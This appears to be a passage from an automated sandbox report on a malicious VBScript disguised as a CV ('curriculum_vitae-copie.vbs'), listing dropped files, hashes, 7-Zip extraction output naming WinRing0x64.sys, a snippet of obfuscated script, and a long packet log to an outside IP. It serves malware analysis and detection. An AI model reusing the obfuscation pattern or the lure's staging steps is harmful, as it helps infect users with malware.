                                                                                                  Preview:7z..'...3ss.@.......@.........../..\#.|.o.<.j...M..K.y..&..x.x......|V.....6D...m@W[.......~n.....S..Ht!.m|c...3.q.c........^..Q....wg6..;q.vo.h.W../ .T.(.v...).G....N....^.P.q...EP.Z'`72f..J...$.*...w.......=.,...I.>6l..$_.......4.U.dO.p.83=...d.M..B9..%r.l.g8.m.-..r....i....9....q...D...vn..p.,.4L.I.U.......|..l._.W.\58.C......8K-..... .........5.@...r5b....L.....Fxv|..M..^....R.K..P.>.=$U..*t...5...@..|.......a.|8..i!._....'..E._,.#...B..]....S....zO...p......|]......i.S/..dphV.....~.j.7.....S...iL..:L.r2...M;.\.s....nT.4.....K<.0.H!M.FR..z.E&@..b..m....J.....n.....R.cy%.I...W32sew...T.t.R..f..Z.....+.Z..N|!....in%.S.yZ.''..{6.w.....`jt..lD^t.......\.?.......{.Q$...N.....8......Q`^..J8.3$Y...[....)Gaz....6e..._.&Ey.hx%...N%.....NM.3R=d)....wL.8...'pU..Z.....R...(.3../.FQ...T..........Hy.e .v'....K.:.....&....JBb]>..........3...v.1.~!.............$...@...R.IkU4P......tLT.\'1.......9(]....qF-........kg..L.m..X.k.7./.UW.eII..BS+....x.

                                                                                                  C:\Users\Public\log.dat

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\wscript.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11
                                                                                                  Entropy (8bit):3.0957952550009344
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:poK:mK
                                                                                                  MD5:7AD2ED382E18A8C2C722AE2B2232092F
                                                                                                  SHA1:498E7363A2A45692896E78E6D9941D97FD231CC9
                                                                                                  SHA-256:F67BA401939C88F48CD02870DB455FA6251EC8644A4739C400A2E4432F98F914
                                                                                                  SHA-512:EB148181D4050F0964C8B1335E4A9835BB455C64B409FA14567825B3417BC48425577DBED44FC043B9E2CED111B9D76604B7B1883A16D11835CEE690EA63EB45
                                                                                                  Malicious:false
                                                                                                  Preview:0606-17h28m

                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\7zr[1].exe

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\wscript.exe
                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):584704
                                                                                                  Entropy (8bit):6.635079012262598
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:trKhRhfkjdw4HKcZDhysKJ1npqCC6BzHtP4iFO+:treJSwIKIysk1nxbVHtdO+
                                                                                                  MD5:F7D5BA4EC2A88F2FF1F0ABEC61108A0B
                                                                                                  SHA1:73EC819230F0C03B46A97FB3A9DEA013151874EA
                                                                                                  SHA-256:89FE813D8A27CCC7F261E32BF1ACD605D55523579C3C0662104C083BFE710D8B
                                                                                                  SHA-512:7AD2C62BB0318841A86DCDBA6F82F4EA7515245D4C9CDE08CB807748BDAE4DE43E4729CA84D8DAA164DD567717CB0AAF49B24E9B5AB6BF31B1418B8144B3B77A
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y.r.............f.......r...............r.......r.........C...............A.....+..............+........g......................Rich............PE..L.....Wd.................t........................@.......................................@.................................$...x.... .......................0...L......................................................4............................text....r.......t.................. ..`.rdata...............x..............@..@.data....j..........................@....sxdata.............................@....rsrc........ ......................@..@.reloc...V...0...X..................@..B................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\gmail[1].7z

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\wscript.exe
                                                                                                  File Type:7-zip archive data, version 0.4
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1960608
                                                                                                  Entropy (8bit):7.999903958520937
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:49152:cUXIV4OGLOd2YHtcmQL/IEP2g3Pg/1oVkZkS:cUXI9H+7VVrkeS
                                                                                                  MD5:D674B5A2A7159B838ADE554C35E15E1D
                                                                                                  SHA1:EDE9027E85C6FE270FA99F6C8597DDC24193C470
                                                                                                  SHA-256:7F5ED3342BCD240C07500B3147C8CAEA27264A936250A29AE4C85BAAE47C4906
                                                                                                  SHA-512:57FB778CC5A0252DC5AA486A424305AAC36E2B20F6BBC2F49C14244B23492DE290C981A56A31D08FD56956657531F767161C527F7255EA1EE5C21EAD9E68E36C
                                                                                                  Malicious:false
                                                                                                  Preview:7z..'...3ss.@.......@.........../..\#.|.o.<.j...M..K.y..&..x.x......|V.....6D...m@W[.......~n.....S..Ht!.m|c...3.q.c........^..Q....wg6..;q.vo.h.W../ .T.(.v...).G....N....^.P.q...EP.Z'`72f..J...$.*...w.......=.,...I.>6l..$_.......4.U.dO.p.83=...d.M..B9..%r.l.g8.m.-..r....i....9....q...D...vn..p.,.4L.I.U.......|..l._.W.\58.C......8K-..... .........5.@...r5b....L.....Fxv|..M..^....R.K..P.>.=$U..*t...5...@..|.......a.|8..i!._....'..E._,.#...B..]....S....zO...p......|]......i.S/..dphV.....~.j.7.....S...iL..:L.r2...M;.\.s....nT.4.....K<.0.H!M.FR..z.E&@..b..m....J.....n.....R.cy%.I...W32sew...T.t.R..f..Z.....+.Z..N|!....in%.S.yZ.''..{6.w.....`jt..lD^t.......\.?.......{.Q$...N.....8......Q`^..J8.3$Y...[....)Gaz....6e..._.&Ey.hx%...N%.....NM.3R=d)....wL.8...'pU..Z.....R...(.3../.FQ...T..........Hy.e .v'....K.:.....&....JBb]>..........3...v.1.~!.............$...@...R.IkU4P......tLT.\'1.......9(]....qF-........kg..L.m..X.k.7./.UW.eII..BS+....x.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):64
                                                                                                  Entropy (8bit):0.9260988789684415
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Nlllulb/lj:NllUb/l
                                                                                                  MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                                                                                                  SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
                                                                                                  SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
                                                                                                  SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                                                                                                  Malicious:false
                                                                                                  Preview:@...e................................................@..........

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5fhh2tk2.a5a.ps1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Preview:1

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uwlcfquj.2yb.psm1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Preview:1

                                                                                                  \Device\ConDrv

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\7g.exe
                                                                                                  File Type:ASCII text, with CRLF, CR line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):533
                                                                                                  Entropy (8bit):5.0064685715477655
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:psrr6QRwWOTjELnFsoBkk3oQv1fRAI0VtN5v:parnwFTjQFbBkk3oQvRRAI8tDv
                                                                                                  MD5:115C929088A166024218C6B1F99B89B1
                                                                                                  SHA1:871A09AF343C9969318B27EE1FB1762AABCA57E7
                                                                                                  SHA-256:5361ECF26BAC65FC26C3E4B65728434D4787641864F2AD13C6015210A05CEE08
                                                                                                  SHA-512:5A1F586C3FF929DEB917F506022532D41D6A14770CCE0292F78CD196A74178C88EC04CFA25F27B16CA058D674756CCEE18B34BAFAF488987EE18C6D4E208C08E
                                                                                                  Malicious:false
                                                                                                  Preview:..7-Zip (r) 23.00 (x86) : Igor Pavlov : Public domain : 2023-05-07....Scanning the drive for archives:.. 0M Scan C:\Users\Public\. .1 file, 1960608 bytes (1915 KiB)....Extracting archive: C:\Users\Public\gmail.7z..--..Path = C:\Users\Public\gmail.7z..Type = 7z..Physical Size = 1960608..Headers Size = 544..Method = LZMA2:6m BCJ 7zAES..Solid = +..Blocks = 6.... 0%. . 61% 4. . 88% 5 - WinRing0x64.sys. .Everything is Ok....Files: 8..Size: 5425957..Compressed: 1960608..

                                                                                                  Static File Info

                                                                                                  General

                                                                                                  File type:assembler source, ASCII text, with very long lines (52487)
                                                                                                  Entropy (8bit):0.5286514443234819
                                                                                                  TrID:
                                                                                                  • Visual Basic Script (13500/0) 100.00%
                                                                                                  File name:curriculum_vitae-copie.vbs
                                                                                                  File size:283689
                                                                                                  MD5:f72b1d9e4780f7b1b63fc2e2e88f1593
                                                                                                  SHA1:95f3a182de433dac071eb353f1abd50b8643aabe
                                                                                                  SHA256:4a346ad97d3b8093e61c3a0ab67a1a6611fb5c399725eea10becbdd0f331ee13
                                                                                                  SHA512:08af647e5eeeef376121f0999b8bac974b4a0a8976e8dde58f37af3f2f2895ddcd772c371d873637ef0b8a5d9c38cc2208c5773bfa84ab4b22efab6ade4ce6e9
                                                                                                  SSDEEP:192:ZxI1d8fxPUiXdKUV+lxq3S+JLGJGaxn6AZs0tuPQaZrr1HVSFNC7aFAZxJpSFqaS:rI1ifJjAXq35G3s0t4Q1C7PLnH03y
                                                                                                  TLSH:0654A7C58CC08118DA57E0B081EF52232B45D8FABB547626CC74A1549E3FF58B72DADB
                                                                                                  File Content Preview:L5Ha87xJcL5 = FormatNumber(34,88).L5y03ESt6GOEL5 = FormatNumber(87,78).L5R21819rL5 = FormatNumber(29,7).L5Q2btcH3zQL5 = Second(182841).L5o0AI9Nw8vL5 = Second(517662).L5s97PU0GTL5 = Second(168144)...L5wasthppwHL5 = Now().L5G1KCY2CL5 = Now().L5z7fCkGjMVwL5

                                                                                                  File Icon

                                                                                                  Icon Hash:68d69b8f86ab9a86

                                                                                                  Network Behavior

                                                                                                  Network Port Distribution

                                                                                                  TCP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Jun 6, 2023 17:28:27.612818956 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:27.612884998 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:27.612957001 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:27.631351948 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:27.631393909 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:27.697961092 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:27.698071003 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:27.937997103 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:27.938043118 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:27.938687086 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:27.938765049 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:27.941720009 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:27.983105898 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:27.983141899 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:27.983166933 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:27.983226061 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:27.983272076 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:27.983288050 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:27.983303070 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:27.983390093 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.003807068 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.003853083 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.003981113 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.004019976 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.004029989 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.004060984 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.004188061 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.004326105 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.004358053 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.004448891 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.004458904 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.004554033 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.025082111 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.025125027 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.025218964 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.025249004 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.025288105 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.025319099 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.025337934 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.025346994 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.025372028 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.025402069 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.025449038 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.025456905 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.025500059 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.025615931 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.025648117 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.025686979 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.025696993 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.025746107 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.025867939 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.025909901 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.025948048 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.025958061 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.026006937 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.026098013 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.026133060 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.026321888 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.026331902 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.026382923 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.026416063 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.026453018 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.026463032 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.026495934 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.026532888 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.047033072 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.047068119 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.047172070 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.047202110 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.047322989 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.047373056 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.047405005 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.047446966 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.047455072 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.047506094 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.047745943 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.047776937 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.047846079 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.047856092 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.047934055 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.048547983 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.048582077 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.048707008 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.048707008 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.048718929 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.048860073 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.048896074 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.048932076 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.048943043 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.048970938 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.049016953 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.049149990 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.049189091 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.049227953 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.049237013 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.049263000 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.049290895 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.049443007 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.049474955 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.049524069 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.049531937 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.049582005 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.050071001 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.050105095 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.050165892 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.050175905 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.050209045 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.050234079 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.050360918 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.050390005 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.050448895 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.050456047 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.050508976 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.050677061 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.050705910 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.050759077 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.050766945 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.050807953 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.050833941 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.050982952 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.051012993 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.051058054 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.051067114 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.051122904 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.051312923 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.051342010 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.051398993 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.051405907 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.051446915 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.051470995 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.067717075 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.067758083 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.067847013 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.067872047 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.067903996 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.067929029 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.068185091 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.068219900 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.068284035 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.068295002 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.068356991 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.068486929 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.068520069 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.068569899 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.068578959 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.068612099 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.068638086 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.068799973 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.068830967 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.069081068 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.069123983 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.069123983 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.069139957 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.069190025 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.069261074 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.069380045 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.069411993 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.069466114 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.069477081 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.069518089 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.069550991 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.069648981 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.069679022 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.069729090 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.069736958 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.069791079 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.071999073 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.072036028 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.072118998 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.072135925 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.072150946 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.072182894 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.072235107 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.072284937 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.072314024 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.072321892 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.072365999 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.072387934 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.072607040 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.072638988 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.072679043 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.072686911 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.072721958 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.072742939 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.072887897 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.072917938 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.072954893 CEST49712443192.168.2.649.12.202.237
                                                                                                  Jun 6, 2023 17:28:28.072962999 CEST4434971249.12.202.237192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.073019981 CEST49712443192.168.2.649.12.202.237
